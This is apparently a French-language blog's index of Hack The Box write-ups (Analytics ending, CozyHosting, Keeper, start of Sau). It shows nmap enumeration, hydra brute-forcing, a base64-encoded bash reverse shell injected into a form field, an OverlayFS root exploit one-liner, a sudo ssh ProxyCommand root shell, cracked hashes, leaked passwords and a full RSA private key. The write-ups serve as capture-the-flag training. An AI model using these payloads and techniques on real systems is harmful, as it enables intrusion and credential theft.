92:D1:09:39:20:AB:FE:4B:68:24:A8:0A:0C:77:86:69:10:19:F9:70: 4F:A3:8A:49:BA:B8:71:27:AA:E9:02:28:09:54:82:34:69:0D:C8:EA: 0E:44:4A:54:32:D2:FC:E5:08:A1:31:1D:FE:BC:AD:06:75:0F:EF:DC: 47:6B:F6:BF:E0:E6:50:4E:51:F8:E6:B0:29:5B:7B:D7:D4:C6:1B:E6: C5:EA:30:01:C6:F9:C4:B1:28:89:C5:63:7C:5F:9D:CB:43:BB:87:7C: A7:DF:C7:4C:C3:8D:17:BD:61:EE:CA:D8:3B:32:81:2B:FA:D0:F6:70: 47:6C:ED:FA:FF:97:EF:4D:B3:C8:D3:E4 parm: check_copy_up:Obsolete; does nothing parm: redirect_max:Maximum length of absolute redirect xattr value (ushort) parm: redirect_dir:Default to on or off for the redirect_dir feature (bool) parm: redirect_always_follow:Follow redirects even if redirect_dir feature is turned off (bool) parm: index:Default to on or off for the inodes index feature (bool) parm: nfs_export:Default to on or off for the NFS export feature (bool) parm: xino_auto:Auto enable xino feature (bool) parm: metacopy:Default to on or off for the metadata only copy up feature (bool) metalytics@analytics:~$ mount | grep overlay overlay on /var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/merged type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BC2SP2TYPJ5O4YFC453ADZ5EKX:/var/lib/docker/overlay2/l/XW5JTCT2MPEXHQG7MOTAI2T4KP:/var/lib/docker/overlay2/l/NFDWLGW3V3JHKDMCSIVCIGFRMU:/var/lib/docker/overlay2/l/MW4MXSGOUKAHBMLEMZ4WR4K7P2:/var/lib/docker/overlay2/l/AT6LTLZWU4G7MV5NOTUEB7AR4N:/var/lib/docker/overlay2/l/E6VXP5EJLZW24GE2AHMELF7FTD:/var/lib/docker/overlay2/l/3BARVZES6SW2GPRYNNYXZNM63J:/var/lib/docker/overlay2/l/JMBR2L6LC7K3O6CZHA24AF2CYR:/var/lib/docker/overlay2/l/PMQWGTOJEKRSOK2OV65KQJBDQY:/var/lib/docker/overlay2/l/L7Y5QRKKSPELNF2AUJ55RR2MV5:/var/lib/docker/overlay2/l/RO73TCQC6F7YHICLAOSVCCNSQ6,upperdir=/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/diff,workdir=/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/work) On a pu en conclure que la machine était bien vulnérable et on a executé le payload expliqué dans l\u0026rsquo;article.\n1 2 3 4 5 metalytics@analytics:~$ unshare -rm sh -c \u0026#34;mkdir l u w m \u0026amp;\u0026amp; cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m \u0026amp;\u0026amp; touch m/*;\u0026#34; \u0026amp;\u0026amp; u/python3 -c \u0026#39;import os;os.setuid(0);os.system(\u0026#34;/bin/bash\u0026#34;)\u0026#39; root@analytics:~# cd /root root@analytics:/root# cat root.txt f241.....692e ","date":"2023-12-30T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/analytics-htb/","title":"HTB | Analytics"},{"content":" Machine name OS IP Difficulty CozyHosting Linux 10.10.11.230 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -sC -A -n -p- 10.10.11.230 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA) |_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://cozyhosting.htb |_http-server-header: nginx/1.18.0 (Ubuntu) /etc/hosts : cozyhosting.htb Quand on tape l\u0026rsquo;ip dans firefox, ca nous redirige directement vers le nom de domaine : cozyhosting.htb\n1 2 3 ## Dans /etc/hosts ## ... 10.10.11.230 cozyhosting.htb hydra : port 80 Le brute force n\u0026rsquo;a pas fonctionné\u0026hellip;\n1 2 3 sudo hydra -l info@cozyhosting.htb -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username or password\u0026#34; -I sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username or password\u0026#34; -I dirbuster, gobuster, dirsearch On a essayé de trouver un dossier à l\u0026rsquo;aide de dirbuster, mais il n\u0026rsquo;y avait rien de concluant.\nCependant, avec l\u0026rsquo;outil dirsearch (qui fait la meme chose que dirbuster et gobuster), on a pu voir qu\u0026rsquo;un dossier actuator était accessible. C\u0026rsquo;est parce que ce mot clée était présent dans la liste utilisé\u0026amp; par défaut pas dirsearch qu\u0026rsquo;on a pu trouver. Il aurait donc suffit de dirbuster/gobuster, ce mot n\u0026rsquo;était jsute pas présent dans la liste que j\u0026rsquo;utilisais. Voici le lien github pour dirsearch :\nhttps://github.com/maurosoria/dirsearch\nLe dossier trouvé intéressant est actuator.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ python3 dirsearch.py -u http://cozyhosting.htb _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11715 Output: /home/kali/github/dirsearch/reports/http_cozyhosting.htb/_23-12-29_17-56-26.txt Target: http://cozyhosting.htb/ [17:56:26] Starting: [17:56:45] 200 - 0B - /;/admin [17:56:45] 200 - 0B - /;/json [17:56:45] 200 - 0B - /;/login [17:56:45] 200 - 0B - /;admin/ [17:56:45] 200 - 0B - /;login/ [17:56:45] 400 - 435B - /\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd [17:56:45] 200 - 0B - /;json/ [17:56:47] 400 - 435B - /a%5c.aspx [17:56:49] 200 - 0B - /actuator/;/auditLog [17:56:49] 200 - 0B - /actuator/;/beans [17:56:49] 200 - 634B - /actuator [17:56:49] 200 - 0B - /actuator/;/auditevents [17:56:49] 200 - 0B - /actuator/;/caches [17:56:49] 200 - 0B - /actuator/;/conditions [17:56:49] 200 - 0B - /actuator/;/configurationMetadata [17:56:49] 200 - 0B - /actuator/;/exportRegisteredServices ... ... [17:57:38] 200 - 0B - /extjs/resources//charts.swf [17:57:45] 200 - 0B - /html/js/misc/swfupload//swfupload.swf [17:57:51] 200 - 0B - /jkstatus; [17:57:55] 200 - 4KB - /login [17:57:55] 200 - 0B - /login.wdm%2e [17:57:56] 204 - 0B - /logout Task Completed Foothold Session Cookie : kanderson user En allant sur le lien, on a pu découvrir un autre lien: http://cozyhosting.htb/actuator/sessions\nIl semblait contenir des cookies de sessions, donc celui d\u0026rsquo;un utilisateur kanderson.\nBurp : Admin Page En utilisant Burp, on pu envoyer une requête pour demander la page /admin puis la modifier à la volée pour écraser le cookie de session par celui trouvé précédemment. Et Bingo ! On arrive bien sur la page admin en tant que kanderson.\nOn peut également modifier le cookie de session directement dans l\u0026rsquo;outil de developpement du navigateur, ici firefox :\nOn observe un formulaire de type POST avec deux paramètres. Si on rentre un hostname puis pas de username, une erreur s\u0026rsquo;affiche indiquant que les parametres de ssh ne sont pas bon. Une injection de code semble possible !\nReverse Shell Sur la machine hote, on prepare un reverse shell comme on va pouvoir envoyer dans burp à la machine cible. On le convertie en base64\n1 2 3 ┌──(kali㉿kali)-[~] └─$ echo \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.25/44444 0\u0026gt;\u0026amp;1\u0026#34; | base64 -w 0 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg== 1 2 3 4 5 ## On execute une commande pour decoder le payload en base64 puis on appel \u0026#34;bash\u0026#34; pour executer le payload ;echo${IFS%??}\u0026#34;YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg==\u0026#34;${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash; ## URL encoded : %3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMjUvNDQ0NDQgMD4mMQo%3D%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D-d%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B On envoie dans Burp en passant le payload dans une variable du formulaire POST :\nSur la machine hôte, on attend avec nc sur le port 44444\n1 2 3 4 python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; export TERM=xterm Ctrl+Z stty raw -echo; fg 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~] └─$ nc -lvp 44444 listening on [any] 44444 ... connect to [10.10.14.125] from cozyhosting.htb [10.10.11.230] 39782 bash: cannot set terminal process group (1063): Inappropriate ioctl for device bash: no job control in this shell app@cozyhosting:/app$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; app@cozyhosting:/app$ export TERM=xterm export TERM=xterm app@cozyhosting:/app$ ^Z zsh: suspended nc -lvp 44444 ┌──(kali㉿kali)-[~] └─$ stty raw -echo; fg [1] + continued nc -lvp 44444 app@cozyhosting:/app$ python -m http.server 4444 On trouve sur la machine un fichier .jar intéressant.\nPSQL bdd credentials Voici les infos qu\u0026rsquo;on a pu trouver dans un fichier présent dans le jar.\n1 2 3 4 5 6 7 8 9 10 11 12 server.address=127.0.0.1 server.servlet.session.timeout=5m management.endpoints.web.exposure.include=health,beans,env,sessions,mappings management.endpoint.sessions.enabled = true spring.datasource.driver-class-name=org.postgresql.Driver spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect spring.jpa.hibernate.ddl-auto=none spring.jpa.database=POSTGRESQL spring.datasource.platform=postgres spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting spring.datasource.username=postgres spring.datasource.password=Vg\u0026amp;nvzAQ7XxR On a essayé de se connecter grâce à ces infos et ça a fonctionné !\n1 2 3 4 5 6 7 app@cozyhosting:/app$ psql -U postgres -h localhost -p 5432 -d cozyhosting Password for user postgres: psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1)) SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off) Type \u0026#34;help\u0026#34; for help. cozyhosting=# Users table : hashes On fouillant dans la base on a trouvé la table users, avec des hashs de mots de passe.\n1 2 3 4 5 6 7 cozyhosting=# \\dt cozyhosting=# select * from users; ----------------------------------------- kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin john: Cracking admin password On a ensuite réussi a cracker le hash du mot de passe de l\u0026rsquo;utilisateur admin :\n1 2 3 4 5 6 7 8 9 10 11 ┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/CozyHosting] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 2 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status manchesterunited (?) 1g 0:00:00:34 DONE (2023-12-29 19:57) 0.02868g/s 80.55p/s 80.55c/s 80.55C/s dougie..keyboard Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed. Il s\u0026rsquo;agit donc de manchesterunited.\nSSH josh : user flag Un peu plus tôt, avait pu accéder au fichier /etc/passwd et on avait alors trouver un nom d\u0026rsquo;utilisateur josh. De plus, on pouvait aussi le trouver en se deplaçant dans /home. Or, cet utilisateur à le rôle administrateur donc le mot de passe devrait fonctionné en ssh:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/CozyHosting] └─$ ssh josh@10.10.11.230 josh@10.10.11.230\u0026#39;s password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat Dec 30 01:01:53 AM UTC 2023 System load: 0.0068359375 Usage of /: 59.8% of 5.42GB Memory usage: 48% Swap usage: 0% Processes: 262 Users logged in: 0 IPv4 address for eth0: 10.10.11.230 IPv6 address for eth0: dead:beef::250:56ff:feb9:2531 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Fri Dec 29 19:20:45 2023 from 10.10.14.94 josh@cozyhosting:~$ cat user.txt db25.....2400 Privilege Escalation josh : SSH as root On observe que josh a le droit d\u0026rsquo;executer la commande /usr/bin/ssh suivi de n\u0026rsquo;importe quel paramètre en mode root.\n1 2 3 4 5 6 7 josh@cozyhosting:~$ sudo -l [sudo] password for josh: Matching Defaults entries for josh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User josh may run the following commands on localhost: (root) /usr/bin/ssh * En allant sur ce site internet, on peut trouver comment générer un shell interactif en partant d\u0026rsquo;une autre commande. Par exemple ici, pour la commande ssh : https://gtfobins.github.io/gtfobins/ssh/\nPour la commande ssh, on obtient 3 manières potentiels d\u0026rsquo;obtenir un shell. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ## 1ère commande ## Ca n\u0026#39;a pas fonctionné car il demande le mot de passe root josh@cozyhosting:~$ sudo /usr/bin/ssh localhost $SHELL --noprofile --norc root@localhost password: Permission denied, please try again. root@localhost password: Permission denied, please try again. root@localhost password: root@localhost: Permission denied (publickey,password). ## 2ème commande ## Ca fonctionne !! On est root sans avoir besoin du mot de passe ! josh@cozyhosting:~$ sudo /usr/bin/ssh -o ProxyCommand=\u0026#39;;sh 0\u0026lt;\u0026amp;2 1\u0026gt;\u0026amp;2\u0026#39; x $ whoami root $ ls user.txt usr $ cd /root $ ls root.txt $ cat root.txt 9ab6.....ba3d5 ","date":"2023-12-30T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/","title":"HTB | CozyHosting"},{"content":" Machine name OS IP Difficulty Keeper Linux 10.10.11.227 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -sC -A -n -p- 10.10.11.227 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA) |_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html). |_http-server-header: nginx/1.18.0 (Ubuntu) Website : tickets.keeper.htb On observe que le port 80 est ouvert. En allant sur firefox, on peut voir une phrase menant vers un lien\n1 To raise an IT support ticket, please visit tickets.keeper.htb/rt/ Pour pouvoir accéder à ce lien sur la machine cible, il faut relier l\u0026rsquo;IP de la machine cible à ce nom de domaine dans le fichier /etc/hosts.\n/etc/hosts 1 2 ## On ajoute la ligne suivante 10.10.11.227 keeper.htb tickets.keeper.htb Foothold Login Page : default credentials En accédant au lien http://tickets.keeper.htb/rt/ on tombe sur une page de connexion user/password. En testant quelques user/password par defaut on trouve : root/password\nEn cherchant sur internet les user/pass par defaut sur Request Tracker, on peut trouver la phrase suivante : The original (default) RT root user password is \u0026ldquo;password\u0026rdquo;\nHydra: Bruteforce login page 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 sudo hydra -l,-L \u0026lt;Username/List\u0026gt; -p,-P \u0026lt;Password/List\u0026gt; \u0026lt;IP or domain name\u0026gt; \u0026lt;Method\u0026gt; \u0026#34;\u0026lt;Path\u0026gt;:\u0026lt;RequestBody\u0026gt;:\u0026lt;IncorrectVerbiage\u0026gt;\u0026#34; ## Dans notre cas sudo hydra -l root -P /usr/share/wordlists/rockyou.txt tickets.keeper.htb http-post-form \u0026#34;/rt/NoAuth/Login.html:user=^USER^\u0026amp;pass=^PASS^\u0026amp;next=b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect\u0026#34; ## Résultat Hydra v9.4 (c) 2022 by van Hauser/THC \u0026amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-28 19:08:49 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://tickets.keeper.htb:80/rt/NoAuth/Login.html:user=^USER^\u0026amp;pass=^PASS^\u0026amp;next=b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect [80][http-post-form] host: tickets.keeper.htb login: root password: password 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-28 19:09:00 On obtient bien root/password à l\u0026rsquo;aide d\u0026rsquo;hydra ! Avec un bruteforce de la méthode POST.\nPassword Leak for user lnorgaard En faisant quelques recherches sur la page d\u0026rsquo;administration du site en tant que root, on a pu lister les utiliseurs ayant les droits d\u0026rsquo;amdministrateurs. On trouve notamment un utilisateur qui aurait le pseudo : lnorgaard\nEn cliquant sur son pseudo, on accède à une page de profil. Sur cette page, on peut lire la description suivante:\nNew user. Initial password set to Welcome2023!\nOn a alors pu se connecter en SSH avec cet utilisateur et ce mot de passe :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌──(kali㉿kali)-[~] └─$ ssh lnorgaard@10.10.11.227 lnorgaard@10.10.11.227\u0026#39;s password: Welcome2023! Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings You have mail. Last login: Fri Dec 29 00:17:45 2023 from 10.10.16.58 lnorgaard@keeper:~$ whoami lnorgaard lnorgaard@keeper:~$ ls KeePassDumpFull.dmp passcodes.kdbx poc.py RT30000.zip user.txt lnorgaard@keeper:~$ cat user.txt 41f1.....d10c Privilege escalation passcodes.kdbx : SSH to root Un fichier avec un dump du mot de passe d\u0026rsquo;une base de donnée keepass est disponible sur le compte de lnorgaard. On trouve une vulnérabilité sur internet pour cracker ce dump. A l\u0026rsquo;aide d\u0026rsquo;un fichier python qu\u0026rsquo;on execute sur ce fichier on obtient le mot de passe de la bdd keepass contenu dans un fichier passcodes.kdbx :\nrødgrød med fløde\nEn ouvrant, à l\u0026rsquo;aide du logiciel keepass et de la clée, un mot de passe pour le ssh : root: F4\u0026gt;\u0026lt;3K0nd!\nIl y a aussi un commentaire qui semble préciser une clée public et une clée privée. Important pour pouvoir se connecter en ssh à root. Le fichier semble avoir été généré par putty.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 PuTTY-User-Key-File-3: ssh-rsa Encryption: none Comment: rsa-key-20230519 Public-Lines: 6 AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D 8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et Private-Lines: 14 AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV 09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is= Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0 En cherchant sur internet, on découvre qu\u0026rsquo;on peut convertir les clées en format openssh pour pouvoir se connecter ensuite en ssh facilement. Voici la commande pour générer les clées :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ## générer la clée public $ puttygen key.ppk -O public-openssh ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et rsa-key-20230519 ## généré la clée privée $ puttygen key.ppk -O private-openssh puttygen: need to specify an output file $ puttygen key.ppk -O private-openssh -o rsa_id $ cat rsa_id ----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAp1arHv4TLMBgUULD7AvxMMsSb3PFqbpfw/K4gmVd9GW3xBdP c9DzVJ+A4rHrCgeMdSrah9JfLz7UUYhM7AW5/pgqQSxwUPvNUxB03NwockWMZPPf Tykkqig8VE2XhSeBQQF6iMaCXaSxyDL4e2ciTQMt+JX3BQvizAo/3OrUGtiGhX6n FSftm50elK1FUQeLYZiXGtvSQKtqfQZHQxrIh/BfHmpyAQNU7hVW1Ldgnp0lDw1A MO8CC+eqgtvMOqv6oZtixjsV7qevizo8RjTbQNsyd/D9RU32UC8RVU1lCk/LvI7p 5y5NJH5zOPmyfIOzFy6m67bIK+csBegnMbNBLQIDAQABAoIBAQCB0dgBvETt8/UF NdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6joDni1wZdo7hTpJ5Zjdmz wxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6A XSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputYf7n24kvL0WlBQThsiLkK cz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzTVkCew1DZuYnYOGQxHYW6 WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivzUXjcCAviPpmSXB19UG8J lTpgORyhAoGBAPaR+FID78BKtzThkhVqAKB7VCryJaw7Ebx6gIxbwOGFu8vpgoB8 S+PfF5qFd7GVXBQ5wNc7tOLRBJXaxTDsTvVy+X8TEbOKfqrKndHjIBpXs+Iy0tOA GSqzgADetwlmklvTUBkHxMEr3VAhkY6zCLf+5ishnWtKwY3UVsr+Z4f1AoGBAK28 /Glmp7Kj7RPumHvDatxtkdT2Iaecl6cYhPPS/OzSFdPcoEOwHnPgtuEzspIsMj2j gZZjHvjcmsbLP4HO6PU5xzTxSeYkcol2oE+BNlhBGsR4b9Tw3UqxPLQfVfKMdZMQ a8QL2CGYHHh0Ra8D6xfNtz3jViwtgTcBCHdBu+lZAoGAcj4NvQpf4kt7+T9ubQeR RMn/pGpPdC5mOFrWBrJYeuV4rrEBq0Br9SefixO98oTOhfyAUfkzBUhtBHW5mcJT jzv3R55xPCu2JrH8T4wZirsJ+IstzZrzjipe64hFbFCfDXaqDP7hddM6Fm+HPoPL TV0IDgHkKxsW9PzmPeWD2KUCgYAt2VTHP/b7drUm8G0/JAf8WdIFYFrrT7DZwOe9 LK3glWR7P5rvofe3XtMERU9XseAkUhTtqgTPafBSi+qbiA4EQRYoC5ET8gRj8HFH 6fJ8gdndhWcFy/aqMnGxmx9kXdrdT5UQ7ItB+lFxHEYTdLZC1uAHrgncqLmT2Wrx heBgKQKBgFViaJLLoCTqL7QNuwWpnezUT7yGuHbDGkHl3JFYdff0xfKGTA7iaIhs qun2gwBfWeznoZaNULe6Khq/HFS2zk/Gi6qm3GsfZ0ihOu5+yOc636Bspy82JHd3 BE5xsjTZIzI66HH5sX5L7ie7JhBTIO2csFuwgVihqM4M+u7Ss/SL -----END RSA PRIVATE KEY----- J\u0026rsquo;ai pu ensuite l\u0026rsquo;envoyer sur la kali puis sur la machine cible (pas forcement necessaire) à l\u0026rsquo;aide de scp:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ## J\u0026#39;ai copié à la main vers la VM en ouvrant avec vim un fichier lnorgaard@keeper:~$ vim rsa_id ## Tentative de connexion ssh vers root lnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0664 for \u0026#39;rsa_id\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key \u0026#34;rsa_id\u0026#34;: bad permissions root@keeper.htb\u0026#39;s password: lnorgaard@keeper:~$ chmod 600 rsa_id ## Tentative de connexion ssh vers root lnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings You have new mail. Last login: Fri Dec 29 00:08:39 2023 from 10.10.14.156 root@keeper:~# whoami root root@keeper:~# ls root.txt RT30000.zip SQL root@keeper:~# cat root.txt be35.....f853 ","date":"2023-12-29T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/keeper-htb/","title":"HTB | Keeper"},{"content":" Machine name OS IP Difficulty Sau Linux 10.10.11.224 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -sC 10.10.11.224 -A -n PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA) | 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 